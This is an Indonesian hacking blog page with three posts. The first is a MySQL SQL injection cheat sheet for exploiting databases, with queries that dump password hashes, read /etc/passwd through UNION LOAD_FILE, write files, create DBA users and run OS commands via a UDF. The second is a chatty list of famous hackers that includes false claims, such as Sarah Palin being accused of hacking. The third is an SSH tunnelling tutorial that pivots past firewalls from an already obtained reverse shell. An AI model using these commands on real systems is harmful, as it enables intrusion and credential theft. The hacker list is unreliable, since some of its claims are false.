Perintah Dasar MYSQL SQL Injection

Februari 22, 2017 0
Postingan kali ini membahas sql injection cheat sheet untuk mempermudah eksploitasi database Beberapa pertanyaan tabel di bawah hanya dapat dijalankan oleh admin. Ini ditandai dengan "- priv" pada akhir query.
VersionSELECT @@version
CommentsSELECT 1; #comment
SELECT /*comment*/1;
Current UserSELECT user();
SELECT system_user();
List UsersSELECT user FROM mysql.user; — priv
List Password HashesSELECT host, user, password FROM mysql.user; — priv
Password CrackerJohn the Ripper will crack MySQL password hashes.
List PrivilegesSELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges; — list user privsSELECT host, user, Select_priv, Insert_priv, Update_priv, Delete_priv, Create_priv, Drop_priv, Reload_priv, Shutdown_priv, Process_priv, File_priv, Grant_priv, References_priv, Index_priv, Alter_priv, Show_db_priv, Super_priv, Create_tmp_table_priv, Lock_tables_priv, Execute_priv, Repl_slave_priv, Repl_client_priv FROM mysql.user; — priv, list user privsSELECT grantee, table_schema, privilege_type FROM information_schema.schema_privileges; — list privs on databases (schemas)SELECT table_schema, table_name, column_name, privilege_type FROM information_schema.column_privileges; — list privs on columns
List DBA AccountsSELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges WHERE privilege_type = ‘SUPER’;SELECT host, user FROM mysql.user WHERE Super_priv = ‘Y’; # priv
Current DatabaseSELECT database()
List DatabasesSELECT schema_name FROM information_schema.schemata; — for MySQL >= v5.0
SELECT distinct(db) FROM mysql.db — priv
List ColumnsSELECT table_schema, table_name, column_name FROM information_schema.columns WHERE table_schema != ‘mysql’ AND table_schema != ‘information_schema’
List TablesSELECT table_schema,table_name FROM information_schema.tables WHERE table_schema != ‘mysql’ AND table_schema != ‘information_schema’
Find Tables From Column NameSELECT table_schema, table_name FROM information_schema.columns WHERE column_name = ‘username’; — find table which have a column called ‘username’
Select Nth RowSELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 0; # rows numbered from 0
SELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 1; # rows numbered from 0
Select Nth CharSELECT substr(‘abcd’, 3, 1); # returns c
Bitwise ANDSELECT 6 & 2; # returns 2
SELECT 6 & 1; # returns 0
ASCII Value -> CharSELECT char(65); # returns A
Char -> ASCII ValueSELECT ascii(‘A’); # returns 65
CastingSELECT cast(’1′ AS unsigned integer);
SELECT cast(’123′ AS char);
String ConcatenationSELECT CONCAT(‘A’,'B’); #returns AB
SELECT CONCAT(‘A’,'B’,'C’); # returns ABC
If StatementSELECT if(1=1,’foo’,'bar’); — returns ‘foo’
Case StatementSELECT CASE WHEN (1=1) THEN ‘A’ ELSE ‘B’ END; # returns A
Avoiding QuotesSELECT 0×414243; # returns ABC
Time DelaySELECT BENCHMARK(1000000,MD5(‘A’));
SELECT SLEEP(5); # >= 5.0.12
Make DNS RequestsImpossible?
Command ExecutionIf mysqld (<5.0) is running as root AND you compromise a DBA account you can execute OS commands by uploading a shared object file into /usr/lib (or similar).  The .so file should contain a User Defined Function (UDF).  raptor_udf.c explains exactly how you go about this.  Remember to compile for the target architecture which may or may not be the same as your attack platform.
Local File Access…’ UNION ALL SELECT LOAD_FILE(‘/etc/passwd’) — priv, can only read world-readable files.
SELECT * FROM mytable INTO dumpfile ‘/tmp/somefile’; — priv, write to file system
Hostname, IP AddressSELECT @@hostname;
Create UsersCREATE USER test1 IDENTIFIED BY ‘pass1′; — priv
Delete UsersDROP USER test1; — priv
Make User DBAGRANT ALL PRIVILEGES ON *.* TO test1@’%'; — priv
Location of DB filesSELECT @@datadir;
Default/System Databasesinformation_schema (>= mysql 5.0)
mysql

Daftar Situs untuk Belajar Hacking

Februari 22, 2017 0
Daftar Hacker di Dunia

Daftar Hacker di Dunia

Februari 22, 2017 0
Daftar Hacker Dunia!
Beberapa orang yang mempunyai Ilmu batas wajar.

1. Joe Desch


Jangan liat jadulnya.... Nih orang mengepalai program yang super rahasia di National Cash Register Co. Dayton. Yang nantinya program tersebut dapat digunakan oleh USA untuk memecahkan kode rahasianya NAZI. Nama Program tersebut Bombe.

2. Shambhu Upadhyaya


Nehi, nehi... hehehe. Ternyata orang India bukan cuma jago nyanyi doangan... ada satu lagi nih.. Shambhu namanya, dia adalah kepala penelitian dari Center of Excellence in Information Systems Assurance Research and Education at the State University of New York at Buffalo. Konon dia mantan hacker trus direkrut deh....

3. Robert Lipka


Ditangkep ama FBI Hari jum'at tanggal Feb. 23, 1996 atas tuduhan mata2 untuk Uni Soviet pada tahun 1960an. Dia dulu kerja di National Security Agency dari taon 1964 ampe 1967


4. Jerome Heckenkamp


Ni poto diambil waktu dia abis keluar dari gedung Federal di Albuquerque. Dia dituduh hacking atas 6 perusahaan website.


5. James S. Green II


Waduh... jangan melotot gitu dong bang.. galak bgt sih... James S. Green II waktu dipoto ini berumur 35 taon. Mantan kepala keamanan (Satpam kali yee...) di General Motor. Dia dituduh hacking atas nomor jaminan sosial dari pegawai GM lalu menghack data2 pegawai yang ada di GM.


6. Sarah Palin


Dituduh hacking atas komputernya Randy Ruedrich (Politikus Alaska). Niatnya cuma pengen nyari bukti atas politikus tersebut atas keterlibatanya dalam tindakan melawan hukum sewaktu politikus tersebut menjadi anggota Alaska Oil & Gas Conservation Commission. Baca juga Pengertian SSH Tunneling


7. Robert Morris Jr


Dituduh atas penyebaran Virus Komputer sewaktu dia masih mahasiswa di Cornell University


8. Dmitry Sklyarov


Umurnya waktu di poto 27 taon. Programmer ini dituduh atas pelanggaran hak cipta atas program di peruhaan Adobe System Inc.


9. Jonathan James


Waktu di poto ni orang masih 16 TAONN !!! gila... Gak tanggung2 loh.... umur segitu dia udah berani hack PENTAGON dan NASA !!! dia nyuri 13 data komputer dari NASA yang salah satu diantaranya adalah program atas stasiun luar angkasa NASA .... Gokil bener nih orang... Dia biasa dikenal di dunia maya sebagai cOmrade


10. Onel A. de Guzman


Weitsss.... jangan liat dari culunya nih orang... Dia orang Pilipina. Klo lo2 pernah denger virus "Love Bug" yang disebarin lewat e-mail... Nah ini dia nih orangnya....


11. Deborah Frincke

Keliatanya Masih muda... jangan liat muda and gendernya yah.... Nih ce adalah Profesor di Bidang IT di University of Idaho, Lewiston, Idaho. Dia bekerja untuk menangkal hacker2 yang kadang bandel hehehe....


12. Unknown


Sengaja gak dikasih tau namanya... Soalnya, lagi dipoto ini nih... dia lagi ngehack situs pemerintahan China (Yah, macam Depkominfo yang dihack itu lahhh....hehehe....) Dia orang Taiwan Aseli.....


13. Dennis Moran


Dipenjara dengan tuduhan hacking atas situs Angkatan Udara punya USA. Dia dipenjara selama 9 bulan. Lucunya.. selagi dipenjara, dia disuruh ama Kepala sipirnya buat program komputer untuk kepentingan penjara tersebut. Di Dunia maya dia biasa dikenal dengan "Coolio".


14. Richard Eaton


Presiden Direktur dari perusahaan WinWhatWhere. Yaitu suatu perusahaan program komputer yang bisa menyelinap kekomputer para hacker tanpa diketahui. Dia biasa bekerja sama dengan FBI.


15. "Mafiaboy"


Dituduh atas hacking situs CNN dan 66 tuduhan hacking atas situs2 besar. Dia ditangkap di Montreal, Canada


16. Jon Lech Johansen


Umurnya baru 19 Taon. Dia orang Norwegia. pencipta program DeCSS. yaitu suatu program yang bisa mengcopy DVD meskipun DVD tersebut sudah di protect... (Mungkin senior2 lebih tau program ini)


17. Kevin Poulsen


Dipoto tanggal 8 September 1990. Dituduh atas tindakan mata2 untuk hacking FBI dan Keamanan Nasional Amerika....


18. Robert Morris Jr


Ni orang potonya sama dengan poto sebelumnya, bedanya dia lagi dipoto di Pengadilan Federal di Syracuse, N.Y., 08 Januari, 1990. Disamping kirinya adalah Ibunda tercinta, sedangkan di sebelah kanan belakang adalah Ayahanda tercinta hehehe.....


19. Kevin Mitnick


Dipoto tanggal 21 Januari 2000. Hacker kesohor nih... dia biasa Phone Preaking, dan dituduh atas pencurian software di Digital Equipment Corporation's computer network (Sumber: Threadnya Kiddiez dengan sedikit informasi tambahan dari wilkipedia). Konon katanya yang berambut merah tersebut adalah salah satu pendukungnya. Gilanya lagi, dia itu dah terkenal hacker hebat, tapi dia masih pengen kuliah di bidang Teknologi komputer... Emang bener kata orang tua, kalo belajar itu gak ngeliat umur.... Seumur hidup kita harus selalu belajar.. halahhh....


20. Lance Spitzner


Pencipta dari the Honeynet Project. Dipoto ini tanggal 19 Juli 2001. Dibelakangnya adalah laboratoriumnya (ada 8 komputer yang On line semuanya) untuk belajar bagaimana carany menembus suatu jaringan komputer. Kalo lo2 pernah denger Blackhat Hacker Community ni dia nih orangnya...


21. Billy Hoffman


Mahasiswa TI Asal Georgia, gak teralu tenar sih... dia cuma hack sistem yang bisa digunakan dengan kartu debit yang biasa digunakan di Georgia Tech University


22. Michael Haephrati, 41, Kiri, Ruth Brier-Haephrati, 28, kanan


Suami istri nih... Sama hobinya... sama profesinya... Ditangkep di Inggris, mereka juga dicari2 ama orang Israel atas tuduhanya hacking Komputer orang Israel dengan menggunakan Trojan Horse...


23. Pierre Kroma


KOnsultan kemanan komputer sewaktu Live Hacking pada acara pameran komputer terbesar di Hannover, Jerman 10 Maret 2005. Sekitar 6200 exhibitors dari lebih dari 70 negara Amprokan disini...


24. Hacking Competition


Dilaksanakan di Singapura, 19 Agustus 2005.... Calon2 pengganti Tsutomu Shimomura hehehehe....


25. "Zamboni"


Analis dari sistem keamanan komputer. Mantan hacker ini sedang berbicara tantang penyerangan terhadap Biometric Systems (Jujur, Gw sih gak ngerti ini apaan, mungkin Senior2 bisa kasih penjelasan.....)


26. Kevin Mitnick


Si Mitnick lagi nih... Tapi dipoto dari atas... sewaktu memasuki ruang pengadilan di Raleigh.. 17 Februari 1995


27. "Mudge,"


Salah satu dedengkot hacker yang sedang bersaksi atas perbuatanya hacking yang bisa membuat jaringan internet diseluruh dunia gak bekerja hanya dengan hitungan 30 menit...


28. Tsutomu Shimomura


Nih dia nih... jagoanya.... Salah satu manusia yang sangat ahli di bidang sistem keamanan komputer. Orang ini nih yang ngalahin Kevin Mitnick. Dia bekerjasama dengan Federal USA untuk menangkap Mitnick yang berusaha menembus komputernya Shimomura.... Gokil..........


29. David L. Smith,


Asal New Jerses USA, 30 Taon... Dia pencipta virus lewat e-mail. Virusnya bernama Melissa (ada yang tau ???)


30. Chen Ing-hau


Pencipta virus Chernobyl, sedang membuat antivirus untuk virus tersebut.. Poto dibelakangnya itu polisi...


31. Richard Pryce


Weiittsss.... jangan ketipu ama tampangnya bro.... Dia ini mahasiswa British Music... gak nyambung banget sih ama hacker.. tapi hal yang telah dibuatnya patut untuk diacungi jempol. Dia berhasil menembus sistem kemanan US Air Force dan Lockheed missile systems yang berbasis di USA !!! Gokil....


32. Eric O. Jenott


Dituduh sebagai mata2. Dia berhasil menembus sistem keamanan komputer departemen pertahanan USA, lalu menjual Informasinya ke China...


33. Ehud Tenebaum atau "The Analyzer''


Ditangkep deket Tel Aviv oleh polisi anti hacker Israel. Nih orang berhasil nembus sistem keamanan milik FBI !!!, dan Ini dia nih ada Pripiunya




34. Gary McKinnon


Umurnya 40 Taon. Kalo menurut gw sih, hacker Nomor 1 di dunia ya si Gary McKinnon... Dia dituduh telah melakukan hacking terbesar dan terbanyak yang dilakukan kepada Jaringan komputer Pemerintahan di USA, tidak kurang dari 97 komputer (Diantaranya adalah US Army, US Air Force, NASA,) udah pernah dimasuki sama Mc Kinnon. Merugikan sekitar US$ 700.000,- . Ni Poto diambil di Pengadilan negeri di London, 10 Mei 2006.

Pengertian SSH Tunneling

Februari 22, 2017 0

Apa itu SSH?

SSH adalah singkatan dari "Secure Shell", itu digunakan untuk membuat koneksi yang aman antara dua komputer.

SSH menyediakan antarmuka baris perintah untuk remote administrasi / manajemen sistem berbasis Linux atau bahkan CISCO router, Hal ini memungkinkan kita untuk aman melakukan berbagai tugas pemeliharaan dan lebih ... pada dasarnya kita bisa menganggapnya sebagai "telnet aman". komunikasi SSH terdiri dari Server SSH dan SSH Client.Baca juga Cara Full Akses Sistem dengan Symlink ke Root

Jadi apa SSH Tunneling adalah?

Kita dapat menggunakan SSH untuk membuat saluran komunikasi terenkripsi untuk tunnel terenkripsi melalui lalu lintas (misalnya POP3). SSH juga mendukung port forwarding yang memungkinkan ssh untuk dilewatkan lalu lintas masuk ke host tertentu dan port. Dalam tutorial ini kita akan melihat pada berbagai skenario dan penggunaan untuk SSH.

Skenario 1:

Host A – SSH Client  (Plink berjalan pada Windows XP)
Host B – SSH Sevrer  (OpenSSH berjalan pada linux)
Host C – Destination (VNC Server diinstal pada sistem Windows XP)

Dalam skenario host ini A memiliki akses ke Host B melalui SSH yang membutuhkan username dan password yang valid untuk sambungan tersebut.

Host A berada di belakang firewall yang blok koneksi vnc keluar pada port 5900 dan ingin terhubung melalui VNC ke Host C.

Mari kita tunnel keluar sesi vnc kami melalui ssh dengan memulai perintah berikut di Host A:


C:\>plink.exe [Host B] -P 22 -C -L 127.0.0.1:53:[Host C]:5900 -l username -pw password 

Kami terhubung ke server ssh kami melalui port 22 dan sebuah tunnel yang telah kami buat.

Menggunakan perintah netstat Anda akan melihat antarmuka loopback Anda (127.0.0.1) sekarang listening pada port 53 (yang merupakan awal dari tunnel).

C:\>netstat -an | FIND "53"
TCP 127.0.0.1:53 0.0.0.0:0 LISTENING

Ketika kita membuka klien vnc kami dan terhubung ke 127.0.0.1:53 data yang akan dikirim melalui tunnel dan akan diteruskan ke port 5900 (yang merupakan ujung tunnel kami).

Jika Anda menggunakan linux SSH bukan Plink Anda dapat menggunakan perintah berikut:
exploit ~ # ssh -L 53:[Host C]:5900 [Host B]

Skenario 2:

Host A - SSH Server (OpenSSH berjalan di linux)

Host B - SSH Client (Plink berjalan pada Windows XP)

Dalam skenario host ini A ingin terhubung ke Host B menggunakan vnc.

Host B terletak di belakang firewall / router tanpa port vnc terbuka

Hal itu memiliki server vnc diinstal dan mendengarkan secara lokal pada port 5900.

untuk skenario ini kita harus sebelumnya memperoleh reverse shell menggunakan netcat atau meterpreter.

Kami akan memulai perintah berikut dari shell kami di Host B :
C:\>plink -P 22 -l username -pw password -C -R 5900:127.0.0.1:5900 [Host A]

Yang harus kita lakukan sekarang adalah membuka klien vnc kami di Host A dan terhubung ke: 127.0.0.1: 5900

Skenario 3:

Host A - SSH Server (OpenSSH dengan remote port forwarding diaktifkan berjalan di linux)

Host B - SSH Client (Plink berjalan pada Windows XP)

Host C - Destination (VNC Server diinstal pada sistem Windows XP)

Skenario ini mirip dengan skenario 2 terkecuali dari host ketiga yang terlibat.

Sekali lagi, kita telah mendapatkan reverse shell di Host B dan kami akan menggunakan Host B untuk tunnel dan lalu lintas ke depan ke Host C vnc server menggunakan perintah berikut:

C:\>plink.exe [Host A] -P 22 -C -R 127.0.0.1:53:[Host C]:5900 -l username -pw password

Sekali lagi membuka klien vnc Anda dan membuat sambungan ke: 127.0.0.1:53